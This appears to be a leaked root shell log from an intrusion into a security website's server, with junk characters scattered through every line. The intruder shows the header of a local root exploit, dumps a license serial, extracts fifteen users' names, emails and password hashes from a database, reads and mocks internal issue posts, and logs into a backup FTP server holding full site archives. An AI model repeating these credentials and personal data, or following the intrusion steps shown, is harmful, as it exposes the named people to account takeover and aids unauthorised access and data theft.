-rw——- 1 com com 21880 Jun 2 08:07 .bash_history0 b) v: y) z$ J. t6 @
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout B1 R$ l/ k# l" m3 V
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
$ b- P8 ~" G! Q' |* q- a) u3 N+ L-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc' b, L i9 w* ]4 J) ?) J
drwx–x–x 3 com com 4096 Jan 29 2008 domains
; M5 Q2 h$ F9 E2 {7 O-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed! G( U8 f3 V; S
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap* l% _$ k$ O1 t) X5 L; ^! N
-rw——- 1 com com 69 Nov 18 2008 .lesshst
% _5 H8 p/ [0 \+ D$ |& w: Y7 |+ Ddrwx—— 2 com com 4096 Sep 24 2007 mail& s- Q3 ~, @/ ?3 P/ c
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history7 N" t8 p1 R, C3 [, \
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
! z2 W; k6 o$ q! W9 } z, {lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html( j* E& i3 _2 J4 `( d% ?* j
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow& E; a8 p- |1 v' o' c* ~
drwx—— 2 com com 4096 Aug 26 2008 .ssh
8 A9 O( w% M; n f6 W* Q |-rwx—— 1 com com 8515 Feb 10 2008 t
- r! U) d$ M" @9 ~' t-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c1 M/ q2 U# _6 q6 Z2 `+ N
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp( L7 Q& M# d) q2 |1 l1 q6 f
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
2 r4 T0 z/ U3 o& \6 a) h; H' p-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
3 d% l- t) f9 V$ u2 m( ~+ |-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
" k& d y8 Y. _-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc4 a; c8 D& E3 z/ n: F
3 L9 k U/ L+ B1 ^9 Lsh-3.2# head t.c
( `% a1 C! {) _8 l1 J8 q" h: B/*
# l" |6 V, r# m* jessica_biel_naked_in_my_bed.c
% ?9 l2 m( e3 d& e2 I3 c1 ~( s/ O9 E& t& j*
+ N1 O" P9 \$ c7 {* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.5 f' E+ W$ j7 N4 m
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.5 s- L0 X0 z6 ^( X( z g; }7 o; I) |
* Stejnak je to stare jak cyp a aj jakesyk rozbite.8 c/ B) r; c/ }" \. s
*
, `$ G" J% L; V2 P5 k; j* Linux vmsplice Local Root Exploit+ @& l" N. N6 `. z
* By qaaz
0 W; J( q7 }1 p*1 C* p% f" B7 ?1 I$ a8 b$ K% J
* \# U: G+ ?' `
sh-3.2# cd /- \$ ?$ L. z4 N( P$ X6 J6 s# \
sh-3.2# ls -la8 N9 R- m& U1 _% Z. `( w
total 360
: B. ^; e$ ~3 P+ _, e0 x! h0 edrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
3 j% |" K2 ~2 i# U1 F& _drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..+ w4 M) j. g) `; _/ R
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group& S1 `4 F7 i9 ~1 g
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user* l9 _; {% l7 P" e. ^
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
, d6 q+ o) d, h( E* f-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
) u9 R' _4 b& C! \% ~% ^! k ]-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel5 T! O5 V6 w3 g" X& |/ Q' O U* c
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
1 T* Q3 U: z, P% c b* F/ zdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin6 Q) z [ m5 f9 ]5 A" T2 Z- C
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
5 O- _3 C/ f+ h8 Gdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
, j' X- M4 Z" Z7 u5 e2 ~3 h% bdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc! D7 |+ z F+ I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home* q+ s! t7 \ p" u3 H
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
) ^0 h7 F! U+ n& H, wdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
$ i8 k6 ?% H. `6 }2 v" g, }: b% @drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib648 ?) W" b/ u7 y/ v
drwx—— 2 root root 16384 Sep 11 2007 lost+found
; C: G; K( S0 S, p3 Y3 c5 wdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
0 ?& J5 D9 T& Y: W3 `* b3 c3 fdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc" L4 V/ I7 v3 Z8 D- s0 H1 ]7 Y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
; O) A0 J% _5 s( s& z( D3 A6 }-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
. z$ N' r H0 ~2 @" udrwxr-xr-x 2 root root 0 Jun 3 02:43 net
. r6 w% y; Q' i" v8 qdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt/ b" J( `$ A9 {& O$ w
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
' t' E+ @: D# G. i0 Z9 y% |( R% ?drwxr-x— 15 root root 4096 Jun 4 08:40 root& o4 r @( U W# A% Y9 f1 |
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin, { U8 }4 a: \* N) U
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux3 T. r( T) M) P5 O' A. i
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
! v# c8 v% c8 X9 ~1 vdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
4 h2 s& w2 h Y# odrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
2 ?( v5 k; d/ Edrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr5 n% N9 I) i. c! Q, T
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
$ q/ w; w, s! G& m6 p- i
# O: g+ Z$ [1 m8 r# x: L" ssh-3.2# cd opt
9 t+ w+ Y# Z5 A; \9 u* r: Osh-3.2# ls -la
! O; W' \4 `" t1 L- htotal 20. t4 K% ]1 ~% r3 k
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
% q% r+ F0 i) Ldrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." z8 P: b! T4 B3 w
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws7 A' x/ D1 s, C; T* T
* L" P, C5 G- s' j+ ~: O& ?sh-3.2# cd lsws/
' `0 v4 u8 i4 B% y' p0 csh-3.2# ls -la
2 W4 G9 D$ R* ^/ w; gtotal 108
" u& B. V) X5 ?6 `& Mdrwxr-xr-x 15 root root 4096 Mar 20 2008 .3 D# @+ s6 R1 P2 E
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..& n7 O& e, h/ ?, d4 {
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons' C0 Y3 w- z! h
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
3 H) h; Z' g0 udrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate3 E) {9 r2 w$ l5 ]. ?7 H
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
3 o. g0 P7 ]- N7 |drwx—— 4 apache apache 4096 Jun 3 02:43 conf+ R) S* d* g3 D& Y3 t8 d: m
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT1 f+ S1 I K4 C# N' X. r% Q$ ]
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
9 B7 f3 @- {7 _+ {( w6 Y% Tdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
: m4 F0 h# Q6 D. D. ^9 a+ fdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
0 E: W* O# Y- ^* e9 k-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE) e* |1 [' f2 i2 q- }
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
; J$ |: ~5 Q" _4 f4 F-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL M$ J9 L5 L$ G1 p/ D( }
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP/ o! B8 v n$ Z1 v
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
2 i* P" b( Y5 rdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
1 k) P" ^1 l0 [& ^( `8 P* A+ |: I& Mdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild3 Y$ g. ^' L; d0 \# z) P2 k: S
drwxr-xr-x 3 root root 4096 Mar 20 2008 share2 Q2 o8 l2 J' Y
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
" t7 Z+ r+ V& ~8 n+ b5 O2 c4 m& O* f' Y
sh-3.2# cd conf- [7 U$ n/ Q$ Z7 @
sh-3.2# ls -la
( P2 q$ A/ H) U. w" c/ itotal 48; r m. `0 K9 w# ~$ @( }' f: R
drwx—— 4 apache apache 4096 Jun 3 02:43 .; Z! X. K) R) p$ f. {7 ?
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..: M9 S0 S: e/ x* {: u9 ~# K% L
drwx—— 2 apache apache 4096 Mar 20 2008 cert( A$ b7 ~, o0 m9 R* R
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
: n4 x( t7 ^- g! A-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak% I! x' K7 i8 T6 g0 j, v
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
6 E3 U0 O0 i$ V& E, W. L-rw——- 1 apache apache 256 May 29 15:10 license.key+ [7 k$ H6 a! `6 ^, r( |; |( ^2 G
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old0 }0 B5 ^) d0 \- T5 f3 u5 _
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties& ?8 G( c+ K1 G, }$ k9 C
-rw——- 1 apache apache 20 May 29 15:10 serial.no) m5 M' C5 t, U4 Y! @" m( R
drwx—— 2 apache apache 4096 Mar 20 2008 templates
7 k( ^, a" {4 a# r/ w
- p6 k) D, T( r1 T$ Qsh-3.2# cat serial.no9 [; j j( O. ?# ~/ b
IbDl-oVsO-CKqL-wVRa0 z$ _/ l: H3 |) C |
# n. Y+ p+ f% e0 M4 Hsh-3.2# mysql
3 X4 w* n% j" _) MWelcome to the MySQL monitor. Commands end with ; or \g.
2 J- q7 s& }. _# H+ VYour MySQL connection id is 286844/ g% x" T7 L1 d4 R! P) [: r
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
- B/ h% a7 D3 {/ @: |
" L `8 y' }. Q" G3 x, _Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.8 L+ a5 H9 T+ M$ \& P
9 h0 q& |) W# J G& nmysql> show databases;
6 D$ q- ~: j* X" C2 }" Q' z+———————–+
0 Y! ?8 I& n: ]8 h! O| Database |3 M) g- g- _& j2 g/ Q6 y0 G* c7 \
+———————–+; a- S0 S G% N" B6 T5 K
| information_schema |0 @4 d: C# r8 T+ Z6 U: E% C2 v
| astanet_ads |
3 i a8 |- c5 _2 B& R7 Q! Z! c4 p$ J| astanet_mailing_lists |/ L s/ f' ^. U3 V9 y# {2 E
| astanet_mediawiki |
) X" K& j7 `6 z| astanet_membersystem |: N0 |- u/ ~1 ?& y- A; E8 [
| com_contrexx |% d& H1 D4 J* Y4 {. S. W; r5 x
| com_contrexx2 |# r' S' e# ^# |
| com_contrexx2_live |
" |; n' ]0 ~* _- e| da_roundcube |2 j9 A7 O; D6 L0 l: L
| dolphin |5 m* ^. F, y. B! w1 w, Z9 N0 [
| ideapool |6 v$ X O6 Q) y$ {/ R e
| mysql |4 [" |3 g' P8 S
| test |3 F7 U9 @+ B8 l4 \& K
| yourmaster |- D" {" | `& v) p
+———————–+
- D+ l$ G' c& h& |9 C* T+ q14 rows in set (0.00 sec)( o* ]5 B- h5 F, M
% L8 W/ d! Z2 f6 i& h; ^1 D7 X( q, g
mysql> use ideapool. J1 T' _, I0 L4 H; S
Database changed' h. h8 x& k) k# F
mysql> show tables;
2 }, H( k. L4 G; J& I, G* S+———————————–+
2 {% w+ n1 u! Q) }0 h| Tables_in_ideapool |
' C) T" ~$ z& F8 j8 P: J2 f+———————————–+
1 ]3 A; x* }3 [: X6 P# u0 O" U| eventum_columns_to_display |$ n: P* E) J% G
| eventum_custom_field |) I" v8 o( u2 H/ {
| eventum_custom_field_option |
2 `$ F& ?$ E! X: ]" @' t| eventum_custom_filter |
% P p9 P( }/ t6 {6 D& {5 \| eventum_customer_account_manager |
" a; z4 D7 @* s( Y| eventum_customer_note |3 w3 }% i5 @, T$ _0 g1 m
| eventum_email_account |
8 Z" y8 k! T6 [$ \. x3 Q; v5 ?, a| eventum_email_draft |
6 I! J. {! Q( ]0 w9 s H" G| eventum_email_draft_recipient |
0 K4 j7 \2 V# J( _1 p| eventum_email_response |. H. J: I5 f& E& e
| eventum_faq |5 Z% Y% i- ?/ [
| eventum_faq_support_level |- N6 T9 J# M5 n5 \
| eventum_group |# K, m/ @3 d! [; y' w
| eventum_history_type |
, |1 o/ Y: B3 p0 ?6 S/ w+ m& |- r" x% || eventum_irc_notice |
8 r8 A/ K: ]* ?4 j2 F& ?6 z| eventum_issue |2 K2 p+ K# O3 w
| eventum_issue_association |7 R- [- H U: Q& g
| eventum_issue_attachment |0 D0 {1 h0 c" M6 `% ~
| eventum_issue_attachment_file |# A0 j' P& H3 ]( k# `) Y
| eventum_issue_checkin |
8 W0 p: B! S G/ V+ L2 @* B. Q& G( ~| eventum_issue_custom_field |5 {, J2 Y+ v' K0 ^5 u8 t' f9 @" |
| eventum_issue_history |6 A* @* P. `$ R) w f
| eventum_issue_quarantine |* y+ S+ G$ {3 g) Q) `) ]$ \3 K
| eventum_issue_requirement |- {, H W% ?/ S% @% a" J! X
| eventum_issue_user |
: Y; U# c( d- Z" k) B: P| eventum_issue_user_replier |/ y/ }7 O5 P, B
| eventum_link_filter |
5 {; q0 Z/ r/ ~4 e3 C0 A| eventum_mail_queue |$ u3 T e4 x7 X! v
| eventum_mail_queue_log |8 [& O) E7 J6 ~$ ^
| eventum_news |, M/ ], X N; |* Z; a8 J
| eventum_note |) I) I k1 O0 |
| eventum_phone_support |
O( u: [# @" c. c5 I9 f! ^1 c| eventum_project |
' Z7 j/ [( w: y# A5 P' {" f| eventum_project_category |9 Z! B& s0 y$ h5 m, x. ~
| eventum_project_custom_field |+ o \9 G9 W0 z5 @3 W+ {
| eventum_project_email_response |
7 U1 S/ C: I# N- g6 M) c2 p| eventum_project_field_display |
* L/ q' o- k# [7 X! ^2 C% f| eventum_project_group |
1 L4 O' J5 C) O1 Y| eventum_project_link_filter |4 u. X' N; P; v; V4 u* b0 S
| eventum_project_news |
6 q& p% j, k. A, Y4 i% `- p7 c8 r# M| eventum_project_phone_category |
u9 k" ~3 `) [& v; p7 Z( u* D1 c& z| eventum_project_priority |/ o: k' N7 ~3 d, y$ v/ ]2 O% |
| eventum_project_release |
2 M& S/ H8 X1 c: }| eventum_project_round_robin |, `' B+ \5 t9 H5 Z1 L
| eventum_project_status |
. ~* U/ i w1 K6 E2 U5 [| eventum_project_status_date |
" e6 ]0 o, m6 g1 \% @+ K| eventum_project_user |
\" H4 v; |1 X( B| eventum_reminder_action |, K# |4 R2 G9 M% |" {
| eventum_reminder_action_list |
# N4 a1 W' {3 n% ~5 Z' B! d| eventum_reminder_action_type |4 W$ S9 t }8 D, F4 _' G
| eventum_reminder_field |3 x V) {9 F, b
| eventum_reminder_history |
! ], \) J7 L' i. Q1 Q4 y6 W| eventum_reminder_level |
# Y# Y& {+ e7 \3 ^' j| eventum_reminder_level_condition |8 |* ?' ~( Z3 H$ P, G
| eventum_reminder_operator |7 F0 y* K0 i7 g) i! P" W
| eventum_reminder_priority |
+ K# K& n8 c! F [) u4 R7 u- W| eventum_reminder_requirement |
; Q4 s( r; c& ?9 C/ d3 i| eventum_reminder_triggered_action |! w# @, ?7 w, F1 A
| eventum_resolution |
5 ]4 z J. v& ^: v| eventum_round_robin_user |
8 h5 E: K* J5 e G2 |" p8 || eventum_search_profile |1 z6 o9 H0 F7 o, u L
| eventum_status |
8 l o' r5 r* U5 Q9 || eventum_subscription |
. @' L) y2 d( k. O" e, |+ c| eventum_subscription_type |- b+ `- H, d! `* ]
| eventum_support_email |
' G; S+ Q4 `5 ^+ ]- q2 _1 w1 {| eventum_support_email_body |- N0 B3 n2 T# c
| eventum_time_tracking |
: u0 f- S0 d' K+ W% w2 j| eventum_time_tracking_category |9 b/ ]% n# T# G
| eventum_user |
) H" w' L& n/ a; J5 y5 J9 P+———————————–+! e8 r% J5 ?9 R0 q; v# d2 p& ^
69 rows in set (0.00 sec)& c3 Y& |4 @! }! U6 y3 t0 M
) C$ Q3 e% n( g' y' `. ?
mysql> describe eventum_user;" c$ @ B j* T& ]) o" z
+————————-+——————+——+—–+———————+—————-++ X% o/ c, @( w' d. z+ V9 [. K7 j# A
| Field | Type | Null | Key | Default | Extra |3 D5 V; Q7 w+ O) O/ H D- V" b9 K3 N
+————————-+——————+——+—–+———————+—————-+8 O: z: ^- O0 v! I. _: j* t. I
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
8 \* i, b. f$ R. L" C| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
& K4 F, b1 B6 O| usr_customer_id | int(11) unsigned | YES | | NULL | |4 L) @8 c0 y. k/ ^" j: ^
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
8 n4 P$ W6 J+ T5 \7 K( L) k d% `| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
; Z. f: S9 D4 a9 ]| usr_status | varchar(8) | NO | | active | |
& t5 r: b3 c, B) E ~6 T| usr_password | varchar(32) | NO | | | |
$ w5 c$ B! f2 [$ m/ T1 B7 h| usr_full_name | varchar(255) | NO | | | |
6 ^8 S" s+ _8 s/ S& j ]* P| usr_email | varchar(255) | NO | UNI | | |
- x* g& L1 E. \! @: s/ g| usr_preferences | longtext | YES | | NULL | |
4 n" B7 O- K" V. {7 I* Y+ j| usr_sms_email | varchar(255) | YES | | NULL | |: y6 g' ~ \% `/ \) e
| usr_clocked_in | tinyint(1) | YES | | 0 | |5 _8 D* P0 B! M; q! H& P" s
| usr_lang | varchar(5) | YES | | NULL | |
) b) Y6 L' ?* t3 ?+————————-+——————+——+—–+———————+—————-+5 X/ m& f. I$ f/ P, s
13 rows in set (0.00 sec)# ]. n* {7 O( x v' g' {
+ t9 t" Q0 Y6 U0 b; Hmysql> select usr_full_name,usr_email,usr_password from eventum_user;% W9 ]9 b5 w, n6 r
+———————-+——————————-+———————————-+
5 V2 ]' A, ?9 [. F| usr_full_name | usr_email | usr_password |
0 n+ O1 q, o& s7 m/ ^' x) T* d- w+———————-+——————————-+———————————-+3 Z- @+ I6 O) g1 m
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |7 K+ E6 Q. ? v+ x9 @4 y6 n
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
0 q. L& q9 W8 s; t" l* R| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |) P' D9 W3 ]( }: ]! o6 P) t2 N
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |) J, T, m! t+ k* i# m
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
$ S. h& S: T2 `+ t+ P% N, r! _| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |4 @, X1 K! h: h4 L9 ]
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
' P$ t6 Y# O5 s7 D" A) a| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
$ M( u$ x8 T/ T" `| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |2 ~0 g3 k5 K" h
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |/ T! C! J& [ Q7 a+ E
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
+ J3 c7 k, s3 A; s* i6 E, T| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |: \+ f5 L9 x! W
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |3 F/ `7 P0 {3 B6 X) C1 I
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |$ S- }) E b9 b8 f1 c& S ~
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
5 v* t/ o4 o& w+———————-+——————————-+———————————-+
; |$ S6 R- H+ {# d3 |) _15 rows in set (0.00 sec); T& ?5 l% R% t2 s
7 v% S- q" y& t4 ~' N) y
mysql> select iss_description from eventum_issue where iss_id = 43;
' m1 S4 f% Z0 d# E+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
5 i% \! K4 j! L- w: Y. C# c| iss_description
9 q1 @# u8 k) v9 }1 f|3 T5 R' v- d" Z0 D9 G; U- h" b
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+9 s8 B- I" U% }+ ?/ a9 Z
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be M8 J$ \9 e% |2 n/ }1 W7 A* [
connected for 90 mins… 120mins… so what i propose is something like:
% _0 @9 h& u( S+ j3 O链接标记[url]http://www.surfthechannel.com/[/url]$ N% C3 U- v. Z+ F) G
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system$ U Y% g P$ C8 o$ I
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
$ L5 E* Y# P! e5 e# gbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
+ ]" X. A% a& _; aif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
* p$ b$ e. U" g1 t0 d) _3 h
- B0 e/ C0 h- TWe could also put advertisement during play on the flash video player itself… extra $$…* Q/ _+ l4 l3 m! e6 w" ^& |, i
" N6 \9 w% L# S" f
By sykadul |
, q8 f/ ?3 }1 X+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+. ~! M7 [4 I! @! X. {, L
1 row in set (0.00 sec)
8 O, }/ M' n7 y; Y L: [& }1 C
1 c+ k: U: A, }, v// Money and extra $$ is all they care about. remember that.3 ]/ I i7 f* m0 D
6 ]+ O) M( i# V; d$ U3 u; Nmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
5 V9 @! w! r* y# I: N+————————+——————————————————————————————————————————————————————————————————————————————-+
& x- T. h2 @& D1 g7 x| iss_summary | iss_description
. o T, h2 K( k Y0 `|( @0 C# E, E) {" ^, S
+————————+——————————————————————————————————————————————————————————————————————————————-+" D6 \/ E1 \- F
| Forum for REAL EXPERTS | Hello,* O: r: v) y: P1 R' i
9 i ?4 z7 K- u
Ishtus and I,
9 y9 k# r1 y) c: X9 J& ~, X$ z. U2 x+ a+ y" ?9 h; M1 I
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
% V, m8 w- @ hONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
9 y, b1 R, @! w: ^. }6 c2 r4 `7 H, n7 Z( W
One example a friend of mine from coresecurity.com!
3 ~% N- T; ~8 }: c0 D/ H% X# g g- n
; n5 Q$ e( M _) n. VWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
5 w9 n. C( g: s- o2 f, x# F: v# \6 `+ H8 O3 w
|4 c% A) r5 p9 w. @
+————————+——————————————————————————————————————————————————————————————————————————————+! ^8 e, f# a/ W1 B5 U
1 row in set (0.00 sec)
8 o5 C7 G. d1 {! @$ _* J; ]0 M' w0 n4 E6 N1 c
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…" C0 w$ f0 O6 x& ~3 l" R1 n' o
/ H3 X! D' O: ~4 v+ ?1 h( ]9 s: `( s
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;: |. ^ M$ [3 w; s$ J
+——————+———————————————————————————————+( A$ O2 Y% t, Z. U
| iss_summary | iss_description |: R- x$ ^, j. K: F# d
+——————+———————————————————————————————+$ W. Z6 U) s) u0 B) C1 l# t& @
| Website guidance | Virtual Girl which guides you trought the website. c9 c3 j# e+ b' ~. W1 C
5 n6 n' v: ]/ v5 P% PWe need a girl with who you can ( talk )!!!
3 b! M* i9 c/ E) F4 O$ DAlso for the News!+ u# K d0 b$ e9 E6 ^: o( r
So my suggestion is a girl who read you the news loud if you like!
5 k3 s6 _! M1 d& j$ ?0 B9 \you can choose between read yourselfe or she read it for you or both!" u5 Y) }8 h' P. [; X$ O u; W( w3 @" X( N+ m
6 T; }8 V3 r* |6 {3 @Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!# B0 T/ y+ {! g0 @. {
. P8 G7 j: `# o7 k$ ~; B
Have a look on the example girls!!
. M. ~( S l) v- p# R6 Q, \! h1 f9 n4 F
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
& f# H3 t! O C+ |* H
& F. w& c, t! }% d1 ` u; b; dor that
) ?" y/ q6 m" _! `+ {
* ]1 S1 k3 ]6 _! j" h9 ^& _链接标记[url]http://www.yellostrom.de/[/url]0 w7 _2 z8 [% e- u
( @+ w9 Q/ f+ l7 a: R|
( x" g. `7 d, J1 w/ _" j6 b' S# K+——————+———————————————————————————————+
% T, S' X1 T, u. ^. c- u$ X% F! \1 row in set (0.00 sec)' Y; i$ a9 T) g% T' m; j2 Q
( B% K2 q: A% c
// ha ha.6 \8 A; ~' D7 C/ j( ^( x
& c0 D$ r, g8 @3 f& o6 q: [
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;4 U! r8 G$ Y1 _0 h$ Q0 |
+————————–+———————————————————————————————————–+2 ^9 w% u; B8 u
| iss_summary | iss_description |" j2 y" c. E7 c% ?. y6 j
+————————–+———————————————————————————————————–+
# g' N) g) E3 |; [| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. | _- j& C# ?0 N* ^. | k: u# x6 X* U
+————————–+———————————————————————————————————–+5 O, o% M; J$ |* K* W, K9 `
1 row in set (0.00 sec)
0 Q" U" h. A& [9 Q
4 `1 ]$ h. }8 G// LOL.
* ~, H0 _ E/ q% W0 z) a4 @# a$ s$ {9 P# ~$ W
mysql> exit
, Z& R5 d4 r( P' Q3 t" }* tBye
" {& D- x& r8 m5 \# j5 Z# r
: P: k- P2 u: B5 ~: `& lsh-3.2# ftp 212.254.194.163% i" \" Z! e4 b3 m
Connected to 212.254.194.163.
6 R& x3 u6 a) j) ^+ z- e% j6 ?! Y6 u3 z220 BackupCOM_VW FTP server ready.
! H9 k9 O3 ^# j/ X6 p504 AUTH: security mechanism ‘GSSAPI’ not supported.% U5 R- G/ V3 m1 M% T
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.; z Z" |# b! X- R* r' d* v/ z
KERBEROS_V4 rejected as an authentication type) r( |4 I6 p: j! D* w# u
Name (212.254.194.163:root): astalavista.com2 ]0 ^ q! u; v( s& x6 q
331 Password required for astalavista.com." J. v. d; Y& o \' [/ A% ^
Password:
% v) U2 E5 K; `$ P230 User astalavista.com logged in.4 |9 Q8 b3 ^+ @0 a, x
Remote system type is UNIX.1 F* ?7 Y$ G. X, p2 W7 M
Using binary mode to transfer files.
/ r& M4 Z. w% s) D4 A; vftp> ls -la- A& L. ~4 U! |9 ^( A% z2 ]
227 Entering Passive Mode (212,254,194,163,2,188)
; j3 c5 t6 N% }1 N V$ @5 b150 Opening BINARY mode data connection for ‘file list’.
1 o5 F1 _7 G" X. a. h8 s3 ~dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
9 S# a; u2 {& U% \6 b* y- c2 U; F226 Transfer complete.
& A5 D; x1 E; ?/ I8 i% j7 Xftp> cd astalavista.com$ ?; f$ e. r9 W6 s O
250 CWD command successful.
% a3 ^8 Y$ v" nftp> ls -la
: d; ~6 _( {$ E- l& e& l& `227 Entering Passive Mode (212,254,194,163,2,189)
; K4 b9 b) T5 ~) e, O" f150 Opening BINARY mode data connection for ‘file list’.2 f( [5 x+ d7 O1 B; I6 S
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar$ V" e0 w3 {" S6 v. }, m* L
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
. C! V: M$ N% v# s-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
